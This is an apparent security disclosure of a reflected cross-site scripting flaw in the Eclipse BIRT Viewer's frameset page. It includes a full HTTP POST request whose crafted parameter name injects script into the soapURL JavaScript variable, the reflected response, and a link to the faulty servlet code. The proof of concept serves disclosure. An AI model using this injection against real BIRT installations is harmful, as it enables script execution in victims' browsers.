Community
Participate
Working Groups
A reflected XSS exists on the frameset viewer inside the BIRT Viewer component. Issuing a HTTP POST to the frameset viewer page with a malicious query parameter name starting with __ will be reflected inside the resulting response as part of the soapURL JavaScript Variable Example request below > POST /viewer/frameset?__report=my_report.rptdesign&__test%22%3Balert%28%27XSS%27%29%3B%20var%20fake%3D%22=value HTTP/1.1 > Host: localhost > Connection: close > Content-Length: 0 > Cache-Control: max-age=0 > Upgrade-Insecure-Requests: 1 > Content-Type: application/x-www-form-urlencoded > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 > Sec-Fetch-Mode: nested-navigate > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 > Sec-Fetch-Site: cross-site > Accept-Encoding: gzip, deflate > Accept-Language: en-US,en;q=0.9 > Cookie: ... Truncated Response > <script type="text/javascript"> > > var soapURL = "https://localhost/viewer/frameset?__test";alert('XSS'); var fake="=value&__report=my_report.rptdesign"; > > var rtl = false; > </script> The issue is due to the way BirtSoapMessageDispatcherServlet generates the soapURL request attribute. https://github.com/eclipse/birt/blob/173e7170d3a5b8e76a6dd629607205a94213fed5/viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/servlet/BirtSoapMessageDispatcherServlet.java#L201